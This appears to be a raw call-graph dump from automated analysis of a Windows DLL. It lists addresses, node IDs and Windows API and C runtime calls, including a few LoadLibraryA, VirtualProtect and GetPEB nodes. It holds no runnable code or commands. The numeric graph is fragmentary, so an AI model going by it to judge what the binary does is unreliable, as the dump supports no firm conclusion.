6c5324d1 ctype 18646->18647 19839 6c537343 18647->19839 18658 6c5368ea 18656->18658 18659 6c5319be 18658->18659 18660 6c5449fe 18658->18660 18659->18523 18661 6c544a10 18660->18661 18662 6c544ab1 18660->18662 18669 6c544a6d RtlAllocateHeap 18661->18669 18671 6c544aa9 18661->18671 18672 6c544a9d 18661->18672 18675 6c544aa2 18661->18675 18677 6c54c046 18661->18677 18686 6c54be9b 18661->18686 18720 6c545c53 18661->18720 18723 6c5449af 18661->18723 18731 6c54c08e 18661->18731 18663 6c54c08e __calloc_impl 6 API calls 18662->18663 18664 6c544ab7 18663->18664 18666 6c545348 __commit 66 API calls 18664->18666 18666->18671 18669->18661 18671->18658 18734 6c545348 18672->18734 18676 6c545348 __commit 66 API calls 18675->18676 18676->18671 18737 6c550cfc 18677->18737 18680 6c54c05a 18682 6c54be9b __NMSG_WRITE 67 API calls 18680->18682 18684 6c54c07c 18680->18684 18681 6c550cfc __set_error_mode 67 API calls 18681->18680 18683 6c54c072 18682->18683 18685 6c54be9b __NMSG_WRITE 67 API calls 18683->18685 18684->18661 18685->18684 18687 6c54beaf 18686->18687 18688 6c550cfc __set_error_mode 64 API calls 18687->18688 18719 6c54c00a 18687->18719 18689 6c54bed1 18688->18689 18690 6c54c00f GetStdHandle 18689->18690 18692 6c550cfc __set_error_mode 64 API calls 18689->18692 18691 6c54c01d _strlen 18690->18691 18690->18719 18695 6c54c036 WriteFile 18691->18695 18691->18719 18694 6c54bee2 18692->18694 18693 6c54bef4 18693->18719 18760 6c550997 18693->18760 18694->18690 18694->18693 18695->18719 18698 6c54bf2a GetModuleFileNameA 18699 6c54bf48 18698->18699 18705 6c54bf6b _strlen 18698->18705 18702 6c550997 _strcpy_s 64 API calls 18699->18702 18703 6c54bf58 18702->18703 18703->18705 18706 6c548034 __invoke_watson 10 API calls 18703->18706 18704 6c54bfae 18785 6c550bd3 18704->18785 18705->18704 18776 6c550c47 18705->18776 18706->18705 18710 6c54bfd2 18713 6c550bd3 _strcat_s 64 API calls 18710->18713 18712 6c548034 __invoke_watson 10 API calls 18712->18710 18715 6c54bfe6 18713->18715 18714 6c548034 __invoke_watson 10 API calls 18714->18704 18716 6c54bff7 18715->18716 18718 6c548034 __invoke_watson 10 API calls 18715->18718 18794 6c550a6a 18716->18794 18718->18716 18719->18661 18845 6c545c28 GetModuleHandleW 18720->18845 18724 6c5449bb __commit 18723->18724 18725 6c5449ec __commit 18724->18725 18848 6c54a914 18724->18848 18725->18661 18727 6c5449d1 18855 6c54b126 18727->18855 18732 6c54a033 __decode_pointer 6 API calls 18731->18732 18733 6c54c09e 18732->18733 18733->18661 18951 6c54a206 GetLastError 18734->18951 18736 6c54534d 18736->18675 18738 6c550d0b 18737->18738 18739 6c545348 __commit 67 API calls 18738->18739 18740 6c54c04d 18738->18740 18741 6c550d2e 18739->18741 18740->18680 18740->18681 18743 6c54815c 18741->18743 18746 6c54a033 TlsGetValue 18743->18746 18745 6c54816c __invoke_watson 18747 6c54a06c GetModuleHandleW 18746->18747 18748 6c54a04b 18746->18748 18750 6c54a087 GetProcAddress 18747->18750 18751 6c54a07c 18747->18751 18748->18747 18749 6c54a055 TlsGetValue 18748->18749 18754 6c54a060 18749->18754 18753 6c54a064 18750->18753 18756 6c545bcf 18751->18756 18753->18745 18754->18747 18754->18753 18757 6c545bda Sleep GetModuleHandleW 18756->18757 18758 6c545bfc 18757->18758 18759 6c545bf8 18757->18759 18758->18750 18758->18753 18759->18757 18759->18758 18761 6c5509af 18760->18761 18762 6c5509a8 18760->18762 18763 6c545348 __commit 67 API calls 18761->18763 18762->18761 18767 6c5509d5 18762->18767 18764 6c5509b4 18763->18764 18765 6c54815c __commit 6 API calls 18764->18765 18766 6c54bf16 18765->18766 18766->18698 18769 6c548034 18766->18769 18767->18766 18768 6c545348 __commit 67 API calls 18767->18768 18768->18764 18821 6c5455b0 18769->18821 18771 6c548061 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18772 6c548131 __invoke_watson 18771->18772 18773 6c54813d GetCurrentProcess TerminateProcess 18771->18773 18772->18773 18823 6c543f34 18773->18823 18775 6c54815a 18775->18698 18780 6c550c59 18776->18780 18777 6c550c5d 18778 6c545348 __commit 67 API calls 18777->18778 18779 6c54bf9b 18777->18779 18784 6c550c79 18778->18784 18779->18704 18779->18714 18780->18777 18780->18779 18782 6c550ca3 18780->18782 18781 6c54815c __commit 6 API calls 18781->18779 18782->18779 18783 6c545348 __commit 67 API calls 18782->18783 18783->18784 18784->18781 18786 6c550beb 18785->18786 18790 6c550be4 18785->18790 18787 6c545348 __commit 67 API calls 18786->18787 18788 6c550bf0 18787->18788 18789 6c54815c __commit 6 API calls 18788->18789 18791 6c54bfc1 18789->18791 18790->18786 18792 6c550c1f 18790->18792 18791->18710 18791->18712 18792->18791 18793 6c545348 __commit 67 API calls 18792->18793 18793->18788 18832 6c54a02a 18794->18832 18797 6c550a8d LoadLibraryA 18798 6c550aa2 GetProcAddress 18797->18798 18812 6c550bb7 18797->18812 18800 6c550ab8 18798->18800 18798->18812 18799 6c550b15 18803 6c54a033 __decode_pointer 6 API calls 18799->18803 18816 6c550b3f 18799->18816 18835 6c549fb8 TlsGetValue 18800->18835 18801 6c54a033 __decode_pointer 6 API calls 18801->18812 18802 6c54a033 __decode_pointer 6 API calls 18810 6c550b82 18802->18810 18806 6c550b32 18803->18806 18808 6c54a033 __decode_pointer 6 API calls 18806->18808 18807 6c549fb8 __encode_pointer 6 API calls 18809 6c550ad3 GetProcAddress 18807->18809 18808->18816 18811 6c549fb8 __encode_pointer 6 API calls 18809->18811 18815 6c54a033 __decode_pointer 6 API calls 18810->18815 18818 6c550b6a 18810->18818 18813 6c550ae8 GetProcAddress 18811->18813 18812->18719 18814 6c549fb8 __encode_pointer 6 API calls 18813->18814 18817 6c550afd 18814->18817 18815->18818 18816->18802 18816->18818 18817->18799 18819 6c550b07 GetProcAddress 18817->18819 18818->18801 18820 6c549fb8 __encode_pointer 6 API calls 18819->18820 18820->18799 18822 6c5455bc __VEC_memzero 18821->18822 18822->18771 18824 6c543f3c 18823->18824 18825 6c543f3e IsDebuggerPresent 18823->18825 18824->18775 18831 6c54ee35 18825->18831 18828 6c547c7e SetUnhandledExceptionFilter UnhandledExceptionFilter 18829 6c547ca3 GetCurrentProcess TerminateProcess 18828->18829 18830 6c547c9b __invoke_watson 18828->18830 18829->18775 18830->18829 18831->18828 18833 6c549fb8 __encode_pointer 6 API calls 18832->18833 18834 6c54a031 18833->18834 18834->18797 18834->18799 18836 6c549fd0 18835->18836 18837 6c549ff1 GetModuleHandleW 18835->18837 18836->18837 18838 6c549fda TlsGetValue 18836->18838 18839 6c54a001 18837->18839 18840 6c54a00c GetProcAddress 18837->18840 18843 6c549fe5 18838->18843 18841 6c545bcf __crt_waiting_on_module_handle 2 API calls 18839->18841 18842 6c549fe9 GetProcAddress 18840->18842 18844 6c54a007 18841->18844 18842->18807 18843->18837 18843->18842 18844->18840 18844->18842 18846 6c545c3c GetProcAddress 18845->18846 18847 6c545c4c ExitProcess 18845->18847 18846->18847 18849 6c54a93c RtlEnterCriticalSection 18848->18849 18850 6c54a929 18848->18850 18849->18727 18864 6c54a851 18850->18864 18852 6c54a92f 18852->18849 18890 6c545bff 18852->18890 18857 6c54b154 18855->18857 18856 6c5449dc 18861 6c5449f5 18856->18861 18857->18856 18860 6c54b1ed 18857->18860 18939 6c54ac8d 18857->18939 18860->18856 18946 6c54ad3d 18860->18946 18950 6c54a83a RtlLeaveCriticalSection 18861->18950 18863 6c5449fc 18863->18725 18865 6c54a85d __commit 18864->18865 18866 6c54a883 18865->18866 18867 6c54c046 __FF_MSGBANNER 67 API calls 18865->18867 18874 6c54a893 __commit 18866->18874 18897 6c54a5c3 18866->18897 18869 6c54a872 18867->18869 18871 6c54be9b __NMSG_WRITE 67 API calls 18869->18871 18870 6c54a89e 18872 6c54a8b4 18870->18872 18873 6c54a8a5 18870->18873 18875 6c54a879 18871->18875 18877 6c54a914 __lock 67 API calls 18872->18877 18876 6c545348 __commit 67 API calls 18873->18876 18874->18852 18878 6c545c53 _doexit 3 API calls 18875->18878 18876->18874 18879 6c54a8bb 18877->18879 18878->18866 18880 6c54a8c3 18879->18880 18881 6c54a8ef 18879->18881 18902 6c54e1d3 18880->18902 18882 6c544618 ___wtomb_environ 67 API calls 18881->18882 18884 6c54a8e0 18882->18884 18919 6c54a90b 18884->18919 18885 6c54a8ce 18885->18884 18906 6c544618 18885->18906 18888 6c54a8da 18889 6c545348 __commit 67 API calls 18888->18889 18889->18884 18891 6c54c046 __FF_MSGBANNER 67 API calls 18890->18891 18892 6c545c09 18891->18892 18893 6c54be9b __NMSG_WRITE 67 API calls 18892->18893 18894 6c545c11 18893->18894 18895 6c54a033 __decode_pointer 6 API calls 18894->18895 18896 6c545c1c 18895->18896 18896->18849 18900 6c54a5cc 18897->18900 18898 6c5449fe _malloc 66 API calls 18898->18900 18899 6c54a602 18899->18870 18900->18898 18900->18899 18901 6c54a5e3 Sleep 18900->18901 18901->18900 18922 6c5453bc 18902->18922 18904 6c54e1df InitializeCriticalSectionAndSpinCount 18905 6c54e223 __commit 18904->18905 18905->18885 18908 6c544624 __commit 18906->18908 18907 6c54469d __commit __dosmaperr 18907->18888 18908->18907 18910 6c54a914 __lock 65 API calls 18908->18910 18918 6c544663 18908->18918 18909 6c544678 HeapFree 18909->18907 18911 6c54468a 18909->18911 18914 6c54463b ___sbh_find_block 18910->18914 18912 6c545348 __commit 65 API calls 18911->18912 18913 6c54468f GetLastError 18912->18913 18913->18907 18917 6c544655 18914->18917 18923 6c54a977 18914->18923 18930 6c54466e 18917->18930 18918->18907 18918->18909 18938 6c54a83a RtlLeaveCriticalSection 18919->18938 18921 6c54a912 18921->18874 18922->18904 18924 6c54ac58 18923->18924 18925 6c54a9b6 18923->18925 18924->18917 18925->18924 18926 6c54aba2 VirtualFree 18925->18926 18927 6c54ac06 18926->18927 18927->18924 18928 6c54ac15 VirtualFree HeapFree 18927->18928 18933 6c548190 18928->18933 18937 6c54a83a RtlLeaveCriticalSection 18930->18937 18932 6c544675 18932->18918 18934 6c5481a8 18933->18934 18935 6c5481cf __VEC_memcpy 18934->18935 18936 6c5481d7 18934->18936 18935->18936 18936->18924 18937->18932 18938->18921 18940 6c54acd4 RtlAllocateHeap 18939->18940 18941 6c54aca0 RtlReAllocateHeap 18939->18941 18943 6c54acbe 18940->18943 18944 6c54acf7 VirtualAlloc 18940->18944 18942 6c54acc2 18941->18942 18941->18943 18942->18940 18943->18860 18944->18943 18945 6c54ad11 HeapFree 18944->18945 18945->18943 18947 6c54ad54 VirtualAlloc 18946->18947 18949 6c54ad9b 18947->18949 18949->18856 18950->18863 18965 6c54a0ae TlsGetValue 18951->18965 18954 6c54a273 SetLastError 18954->18736 18957 6c54a033 __decode_pointer 6 API calls 18958 6c54a24b 18957->18958 18959 6c54a252 18958->18959 18960 6c54a26a 18958->18960 18976 6c54a11f 18959->18976 18962 6c544618 ___wtomb_environ 64 API calls 18960->18962 18964 6c54a270 18962->18964 18963 6c54a25a GetCurrentThreadId 18963->18954 18964->18954 18966 6c54a0c3 18965->18966 18967 6c54a0de 18965->18967 18968 6c54a033 __decode_pointer 6 API calls 18966->18968 18967->18954 18970 6c54a608 18967->18970 18969 6c54a0ce TlsSetValue 18968->18969 18969->18967 18972 6c54a611 18970->18972 18973 6c54a231 18972->18973 18974 6c54a62f Sleep 18972->18974 18994 6c54b40b 18972->18994 18973->18954 18973->18957 18975 6c54a644 18974->18975 18975->18972 18975->18973 19011 6c5453bc 18976->19011 18978 6c54a12b GetModuleHandleW 18979 6c54a141 18978->18979 18980 6c54a13b 18978->18980 18982 6c54a17d 18979->18982 18983 6c54a159 GetProcAddress GetProcAddress 18979->18983 18981 6c545bcf __crt_waiting_on_module_handle 2 API calls 18980->18981 18981->18979 18984 6c54a914 __lock 63 API calls 18982->18984 18983->18982 18985 6c54a19c InterlockedIncrement 18984->18985 19012 6c54a1f4 18985->19012 18988 6c54a914 __lock 63 API calls 18989 6c54a1bd 18988->18989 19015 6c550414 InterlockedIncrement 18989->19015 18991 6c54a1db 19027 6c54a1fd 18991->19027 18993 6c54a1e8 __commit 18993->18963 18995 6c54b417 __commit 18994->18995 18996 6c54b42f 18995->18996 19006 6c54b44e _memset 18995->19006 18997 6c545348 __commit 66 API calls 18996->18997 18998 6c54b434 18997->18998 19000 6c54815c __commit 6 API calls 18998->19000 18999 6c54b4c0 RtlAllocateHeap 18999->19006 19003 6c54b444 __commit 19000->19003 19001 6c54c08e __calloc_impl 6 API calls 19001->19006 19002 6c54a914 __lock 66 API calls 19002->19006 19003->18972 19004 6c54b126 ___sbh_alloc_block 5 API calls 19004->19006 19006->18999 19006->19001 19006->19002 19006->19003 19006->19004 19007 6c54b507 19006->19007 19010 6c54a83a RtlLeaveCriticalSection 19007->19010 19009 6c54b50e 19009->19006 19010->19009 19011->18978 19030 6c54a83a RtlLeaveCriticalSection 19012->19030 19014 6c54a1b6 19014->18988 19016 6c550435 19015->19016 19017 6c550432 InterlockedIncrement 19015->19017 19018 6c550442 19016->19018 19019 6c55043f InterlockedIncrement 19016->19019 19017->19016 19020 6c55044c InterlockedIncrement 19018->19020 19021 6c55044f 19018->19021 19019->19018 19020->19021 19022 6c550459 InterlockedIncrement 19021->19022 19023 6c55045c 19021->19023 19022->19023 19024 6c550475 InterlockedIncrement 19023->19024 19025 6c550485 InterlockedIncrement 19023->19025 19026 6c550490 InterlockedIncrement 19023->19026 19024->19023 19025->19023 19026->18991 19031 6c54a83a RtlLeaveCriticalSection 19027->19031 19029 6c54a204 19029->18993 19030->19014 19031->19029 19033 6c5314b6 19032->19033 19034 6c5314ac ctype 19032->19034 19035 6c5314ed 19033->19035 19042 6c5313f0 19033->19042 19034->18528 19037 6c53150a 19035->19037 19038 6c5314fd 19035->19038 19059 6c543f43 19037->19059 19047 6c543fc0 19038->19047 19041 6c531508 19041->18528 19043 6c531330 19042->19043 19044 6c5313b0 19043->19044 19045 6c543f43 _memcpy_s 67 API calls 19043->19045 19044->19035 19046 6c53137d 19045->19046 19046->19035 19048 6c543fd0 19047->19048 19058 6c543fe9 19047->19058 19049 6c543fd5 19048->19049 19050 6c543ff5 19048->19050 19051 6c545348 __commit 67 API calls 19049->19051 19052 6c544008 19050->19052 19053 6c543ffa 19050->19053 19057 6c543fda 19051->19057 19055 6c548190 ___BuildCatchObjectHelper __VEC_memcpy 19052->19055 19054 6c545348 __commit 67 API calls 19053->19054 19054->19057 19055->19058 19056 6c54815c __commit 6 API calls 19056->19058 19057->19056 19058->19041 19063 6c543f53 _memcpy_s 19059->19063 19064 6c543f57 _memset 19059->19064 19060 6c543f5c 19061 6c545348 __commit 67 API calls 19060->19061 19062 6c543f61 19061->19062 19066 6c54815c __commit 6 API calls 19062->19066 19063->19041 19064->19060 19064->19063 19065 6c543fa6 19064->19065 19065->19063 19067 6c545348 __commit 67 API calls 19065->19067 19066->19063 19067->19062 19073 6c543d7f 19068->19073 19069 6c536dc1 ctype 2 API calls 19069->19073 19070 6c543dad 19071 6c5368e2 ctype 67 API calls 19070->19071 19072 6c543d92 _memset ctype 19071->19072 19072->18550 19073->19069 19073->19070 19073->19072 19074 6c543e3c 19073->19074 19075 6c5368e2 ctype 67 API calls 19074->19075 19076 6c543e45 19075->19076 19123 6c535ac0 19076->19123 19079 6c535cd6 19078->19079 19126 6c53afc3 19079->19126 19081 6c535d57 19082 6c53afc3 69 API calls 19081->19082 19083 6c535d61 19082->19083 19136 6c5364e0 19083->19136 19086 6c535eba GlobalAlloc 19089 6c535d97 19086->19089 19087 6c5367c3 19088 6c5360f0 CreateFileW 19088->19089 19090 6c5361de 19088->19090 19089->19086 19089->19087 19089->19088 19089->19089 19093 6c535de6 19091->19093 19092 6c535eba GlobalAlloc 19092->19093 19093->19092 19094 6c5361d2 19093->19094 19095 6c5360f0 CreateFileW 19093->19095 19095->19093 19095->19094 19097 6c53b201 19096->19097 19098 6c53b1fc 19096->19098 19100 6c53b211 19097->19100 19101 6c543d6c 69 API calls 19097->19101 19099 6c536dc1 ctype 2 API calls 19098->19099 19099->19097 19100->18550 19101->19100 19102->19102 19106 6c535de6 19102->19106 19103 6c5367c3 19104 6c535eba GlobalAlloc 19104->19106 19105 6c5360f0 CreateFileW 19105->19106 19107 6c5361de 19105->19107 19106->19103 19106->19104 19106->19105 19109 6c5363fe 19108->19109 19110 6c5366f0 19109->19110 19111 6c5365f3 LoadLibraryA VirtualProtect 19109->19111 19112 6c5367f8 19111->19112 19113 6c536649 VirtualProtect 19112->19113 19114 6c536663 19113->19114 19114->18550 19116 6c5452a4 19115->19116 19117 6c5452b0 RaiseException 19115->19117 19116->19117 19117->18542 19119 6c54527b __CxxThrowException@8 RaiseException 19118->19119 19120 6c536ddc __EH_prolog3 19119->19120 19144 6c53ba28 LocalAlloc 19120->19144 19122 6c536df3 ctype 19122->18539 19124 6c543f43 _memcpy_s 67 API calls 19123->19124 19125 6c535ad9 19124->19125 19125->19072 19130 6c53afd6 19126->19130 19127 6c536dc1 ctype 2 API calls 19127->19130 19128 6c53b009 19129 6c5368e2 ctype 67 API calls 19128->19129 19131 6c53afe9 _memset ctype 19129->19131 19130->19127 19130->19128 19130->19131 19132 6c53b08c 19130->19132 19131->19081 19133 6c5368e2 ctype 67 API calls 19132->19133 19134 6c53b094 19133->19134 19135 6c535ac0 67 API calls 19134->19135 19135->19131 19141 6c5364ea LoadLibraryA VirtualProtect 19136->19141 19140 6c535d67 GetPEB 19140->19089 19142 6c5367f8 19141->19142 19143 6c536649 VirtualProtect 19142->19143 19143->19140 19145 6c53ba41 19144->19145 19146 6c53ba3c 19144->19146 19145->19122 19148 6c536d89 19146->19148 19149 6c54527b __CxxThrowException@8 RaiseException 19148->19149 19150 6c536da4 19149->19150 19152 6c537696 ctype 19151->19152 19153 6c537807 19152->19153 19157 6c5376bd 19152->19157 19154 6c5377fb 19153->19154 19215 6c532330 19153->19215 19156 6c543f34 __invoke_watson 5 API calls 19154->19156 19158 6c537835 19156->19158 19172 6c53748e 19157->19172 19158->18557 19249 6c531440 19166->19249 19168 6c537312 _memset 19169 6c536a35 67 API calls 19168->19169 19170 6c537329 PathStripToRootW 19169->19170 19171 6c53733d 19170->19171 19171->18559 19173 6c53749d __EH_prolog3_GS 19172->19173 19174 6c536dc1 ctype 2 API calls 19173->19174 19175 6c5374c7 GetFullPathNameW 19173->19175 19174->19173 19176 6c5374e0 19175->19176 19177 6c537505 19175->19177 19222 6c536a35 19176->19222 19179 6c537524 19177->19179 19180 6c537509 19177->19180 19184 6c5372fd 68 API calls 19179->19184 19182 6c532330 67 API calls 19180->19182 19188 6c5374fe ctype 19180->19188 19181 6c5374ef 19183 6c53745f 68 API calls 19181->19183 19182->19188 19183->19188 19186 6c537540 PathIsUNCW 19184->19186 19186->19188 19189 6c537554 GetVolumeInformationW 19186->19189 19228 6c5451b5 19188->19228 19190 6c537577 19189->19190 19191 6c537596 19189->19191 19192 6c53745f 68 API calls 19190->19192 19193 6c5375a6 19191->19193 19194 6c53759f CharUpperW 19191->19194 19192->19188 19193->19188 19195 6c5375af FindFirstFileW 19193->19195 19194->19193 19195->19188 19196 6c5375c7 FindClose 19195->19196 19196->19190 19197 6c5375d7 19196->19197 19197->19190 19198 6c5375df lstrlenW 19197->19198 19199 6c53762d 19198->19199 19200 6c5375fc 19198->19200 19199->19188 19202 6c532330 67 API calls 19199->19202 19225 6c536ea0 19200->19225 19202->19188 19216 6c53233b 19215->19216 19217 6c53234a 19215->19217 19218 6c5314a0 67 API calls 19216->19218 19220 6c5314a0 67 API calls 19217->19220 19219 6c532344 19218->19219 19219->19154 19221 6c532369 19220->19221 19221->19154 19231 6c5444cb 19222->19231 19224 6c536a4b 19224->19181 19240 6c5451ed 19225->19240 19227 6c536eb3 19227->19188 19229 6c543f34 __invoke_watson 5 API calls 19228->19229 19230 6c5451bf 19229->19230 19230->19230 19234 6c5444dd 19231->19234 19232 6c5444e1 19233 6c545348 __commit 67 API calls 19232->19233 19235 6c5444e6 19232->19235 19239 6c5444fd 19233->19239 19234->19232 19234->19235 19237 6c54452d 19234->19237 19235->19224 19236 6c54815c __commit 6 API calls 19236->19235 19237->19235 19238 6c545348 __commit 67 API calls 19237->19238 19238->19239 19239->19236 19241 6c545205 19240->19241 19242 6c5451fe 19240->19242 19243 6c545348 __commit 67 API calls 19241->19243 19242->19241 19247 6c545231 19242->19247 19244 6c54520a 19243->19244 19245 6c54815c __commit 6 API calls 19244->19245 19246 6c545219 19245->19246 19246->19227 19247->19246 19248 6c545348 __commit 67 API calls 19247->19248 19248->19244 19250 6c531465 19249->19250 19251 6c53145d 19249->19251 19250->19168 19252 6c5313f0 67 API calls 19251->19252 19252->19250 19254 6c5348be 19253->19254 19255 6c5315f0 67 API calls 19254->19255 19256 6c53493e 19255->19256 19306 6c5330e0 19256->19306 19258 6c53496f 19259 6c534a3d 19258->19259 19309 6c533150 19258->19309 19262 6c543f34 __invoke_watson 5 API calls 19259->19262 19264 6c534aae 19262->19264 19263 6c5315f0 67 API calls 19265 6c534996 19263->19265 19264->18582 19313 6c535670 19265->19313 19267 6c5349d6 19268 6c53afc3 69 API calls 19267->19268 19269 6c5349f9 _memcpy_s 19268->19269 19269->19259 19270 6c544618 ___wtomb_environ 67 API calls 19269->19270 19270->19259 19272 6c534b00 19271->19272 19516 6c533720 19272->19516 19293 6c5354f7 19292->19293 19297 6c5354be 19292->19297 19294 6c5331f0 102 API calls 19293->19294 19293->19297 19295 6c53551a 19294->19295 19296 6c532600 101 API calls 19295->19296 19296->19297 19297->18582 19299 6c534616 19298->19299 19300 6c543f34 __invoke_watson 5 API calls 19299->19300 19301 6c5346ee 19300->19301 19301->18570 19303 6c5347f9 19302->19303 19304 6c543f34 __invoke_watson 5 API calls 19303->19304 19305 6c534873 19304->19305 19305->18579 19325 6c532b50 19306->19325 19308 6c5330f2 _wcspbrk 19308->19258 19310 6c53318b 19309->19310 19311 6c532600 101 API calls 19310->19311 19312 6c5331d7 19311->19312 19312->19263 19314 6c535681 lstrlenW 19313->19314 19315 6c53567b 19313->19315 19431 6c535730 19314->19431 19315->19267 19318 6c5356c5 GetLastError 19320 6c5356d0 WideCharToMultiByte 19318->19320 19321 6c535716 19318->19321 19319 6c53571f 19319->19267 19322 6c535730 73 API calls 19320->19322 19321->19319 19439 6c535b00 GetLastError 19321->19439 19323 6c5356f4 WideCharToMultiByte 19322->19323 19323->19321 19326 6c532b7e 19325->19326 19327 6c532bd1 19326->19327 19328 6c532bb9 19326->19328 19330 6c5314a0 67 API calls 19327->19330 19332 6c53a58c 19328->19332 19331 6c532bc2 19330->19331 19331->19308 19335 6c53aef1 19332->19335 19340 6c53c050 19335->19340 19337 6c53af00 19338 6c53a591 19337->19338 19351 6c53bb0c 19337->19351 19338->19331 19342 6c53c05c __EH_prolog3 19340->19342 19341 6c536dc1 ctype 2 API calls 19341->19342 19342->19341 19343 6c53c0aa 19342->19343 19357 6c53bd66 TlsAlloc 19342->19357 19361 6c53bc4e RtlEnterCriticalSection 19342->19361 19375 6c53ba5b RtlEnterCriticalSection 19343->19375 19348 6c53c0d0 ctype 19348->19337 19349 6c53c0bd 19382 6c53be0d 19349->19382 19352 6c53bb18 __EH_prolog3_catch 19351->19352 19354 6c53bb41 ctype 19352->19354 19414 6c53c220 19352->19414 19354->19337 19355 6c53bb27 19424 6c53c292 19355->19424 19358 6c53bd92 19357->19358 19359 6c53bd97 RtlInitializeCriticalSection 19357->19359 19360 6c536d89 ctype RaiseException 19358->19360 19359->19342 19360->19359 19362 6c53bc71 19361->19362 19364 6c53bcaa ctype 19362->19364 19365 6c53bcbf GlobalHandle GlobalUnlock 19362->19365 19373 6c53bd30 _memset 19362->19373 19363 6c53bd47 RtlLeaveCriticalSection 19363->19342 19367 6c53bcb2 GlobalAlloc 19364->19367 19404 6c5369d7 19365->19404 19369 6c53bce9 19367->19369 19368 6c53bcdd GlobalReAlloc 19368->19369 19370 6c53bd10 GlobalLock 19369->19370 19371 6c53bd02 RtlLeaveCriticalSection 19369->19371 19372 6c53bcf4 GlobalHandle GlobalLock 19369->19372 19370->19373 19374 6c536d89 ctype RaiseException 19371->19374 19372->19371 19373->19363 19374->19370 19376 6c53ba76 19375->19376 19377 6c53ba9d RtlLeaveCriticalSection 19375->19377 19376->19377 19379 6c53ba7b TlsGetValue 19376->19379 19378 6c53baa6 19377->19378 19378->19348 19378->19349 19379->19377 19380 6c53ba87 19379->19380 19380->19377 19381 6c53ba8c RtlLeaveCriticalSection 19380->19381 19381->19378 19406 6c5450fc 19382->19406 19384 6c53be19 RtlEnterCriticalSection 19385 6c53be38 19384->19385 19390 6c53bf1c RtlLeaveCriticalSection 19384->19390 19387 6c53be41 TlsGetValue 19385->19387 19385->19390 19389 6c53be7f 19387->19389 19398 6c53be4f 19387->19398 19388 6c53bf3f ctype 19388->19348 19391 6c53ba28 ctype 2 API calls 19389->19391 19390->19388 19392 6c53be89 19391->19392 19407 6c53bbbf 19392->19407 19393 6c53bec4 ctype 19396 6c53bed0 LocalReAlloc 19393->19396 19394 6c53be69 ctype 19397 6c53be73 LocalAlloc 19394->19397 19399 6c53bedc 19396->19399 19397->19399 19398->19390 19398->19393 19398->19394 19400 6c53bee0 RtlLeaveCriticalSection 19399->19400 19401 6c53beee _memset 19399->19401 19402 6c536d89 ctype RaiseException 19400->19402 19403 6c53bf07 TlsSetValue 19401->19403 19402->19401 19403->19390 19405 6c5369ec ctype 19404->19405 19405->19368 19406->19384 19410 6c53bba5 19407->19410 19411 6c53bbb0 19410->19411 19412 6c53bbb5 19410->19412 19413 6c536dc1 ctype LocalAlloc RaiseException 19411->19413 19412->19398 19413->19412 19415 6c53c230 19414->19415 19418 6c53c235 19414->19418 19416 6c536dc1 ctype 2 API calls 19415->19416 19416->19418 19417 6c53c243 19420 6c53c255 RtlEnterCriticalSection 19417->19420 19421 6c53c27f RtlEnterCriticalSection 19417->19421 19418->19417 19428 6c53c1b7 19418->19428 19422 6c53c261 RtlInitializeCriticalSection 19420->19422 19423 6c53c274 RtlLeaveCriticalSection 19420->19423 19421->19355 19422->19423 19423->19421 19425 6c53c2a4 RtlLeaveCriticalSection 19424->19425 19426 6c53c29f 19424->19426 19425->19354 19427 6c536dc1 ctype 2 API calls 19426->19427 19427->19425 19429 6c53c1c0 RtlInitializeCriticalSection 19428->19429 19430 6c53c1d5 19428->19430 19429->19430 19430->19417 19432 6c535734 19431->19432 19437 6c535788 19432->19437 19438 6c535771 19432->19438 19441 6c5446a6 19432->19441 19433 6c544618 ___wtomb_environ 67 API calls 19433->19437 19436 6c53569f WideCharToMultiByte 19436->19318 19436->19319 19437->19436 19452 6c544721 19437->19452 19438->19433 19438->19437 19440 6c535b0a 19439->19440 19442 6c5446b5 19441->19442 19443 6c5446dd 19441->19443 19442->19443 19444 6c5446c1 19442->19444 19449 6c5446f2 19443->19449 19459 6c547637 19443->19459 19445 6c545348 __commit 67 API calls 19444->19445 19448 6c5446c6 19445->19448 19450 6c54815c __commit 6 API calls 19448->19450 19472 6c544ac8 19449->19472 19451 6c5446d6 _memset 19450->19451 19451->19438 19453 6c54b40b __calloc_impl 67 API calls 19452->19453 19454 6c54473b 19453->19454 19455 6c545348 __commit 67 API calls 19454->19455 19458 6c544757 19454->19458 19456 6c54474e 19455->19456 19457 6c545348 __commit 67 API calls 19456->19457 19456->19458 19457->19458 19458->19437 19460 6c547643 __commit 19459->19460 19461 6c547670 19460->19461 19462 6c547653 19460->19462 19463 6c5476b1 RtlSizeHeap 19461->19463 19465 6c54a914 __lock 67 API calls 19461->19465 19464 6c545348 __commit 67 API calls 19462->19464 19468 6c547668 __commit 19463->19468 19466 6c547658 19464->19466 19469 6c547680 ___sbh_find_block 19465->19469 19467 6c54815c __commit 6 API calls 19466->19467 19467->19468 19468->19449 19508 6c5476d1 19469->19508 19473 6c544ad4 __commit 19472->19473 19474 6c544ae9 19473->19474 19475 6c544adb 19473->19475 19477 6c544af0 19474->19477 19478 6c544afc 19474->19478 19476 6c5449fe _malloc 67 API calls 19475->19476 19493 6c544ae3 __commit __dosmaperr 19476->19493 19479 6c544618 ___wtomb_environ 67 API calls 19477->19479 19485 6c544c6e 19478->19485 19506 6c544b09 _memcpy_s ___sbh_resize_block ___sbh_find_block 19478->19506 19479->19493 19480 6c544ca1 19481 6c54c08e __calloc_impl 6 API calls 19480->19481 19484 6c544ca7 19481->19484 19482 6c54a914 __lock 67 API calls 19482->19506 19483 6c544c73 RtlReAllocateHeap 19483->19485 19483->19493 19487 6c545348 __commit 67 API calls 19484->19487 19485->19480 19485->19483 19486 6c544cc5 19485->19486 19488 6c54c08e __calloc_impl 6 API calls 19485->19488 19491 6c544cbb 19485->19491 19489 6c545348 __commit 67 API calls 19486->19489 19486->19493 19487->19493 19488->19485 19490 6c544cce GetLastError 19489->19490 19490->19493 19494 6c545348 __commit 67 API calls 19491->19494 19493->19451 19496 6c544c3c 19494->19496 19495 6c544b94 RtlAllocateHeap 19495->19506 19496->19493 19497 6c544c41 GetLastError 19496->19497 19497->19493 19498 6c544be9 RtlReAllocateHeap 19498->19506 19499 6c54b126 ___sbh_alloc_block 5 API calls 19499->19506 19500 6c544c54 19500->19493 19502 6c545348 __commit 67 API calls 19500->19502 19501 6c54c08e __calloc_impl 6 API calls 19501->19506 19504 6c544c61 19502->19504 19503 6c544c37 19505 6c545348 __commit 67 API calls 19503->19505 19504->19490 19504->19493 19505->19496 19506->19480 19506->19482 19506->19493 19506->19495 19506->19498 19506->19499 19506->19500 19506->19501 19506->19503 19507 6c54a977 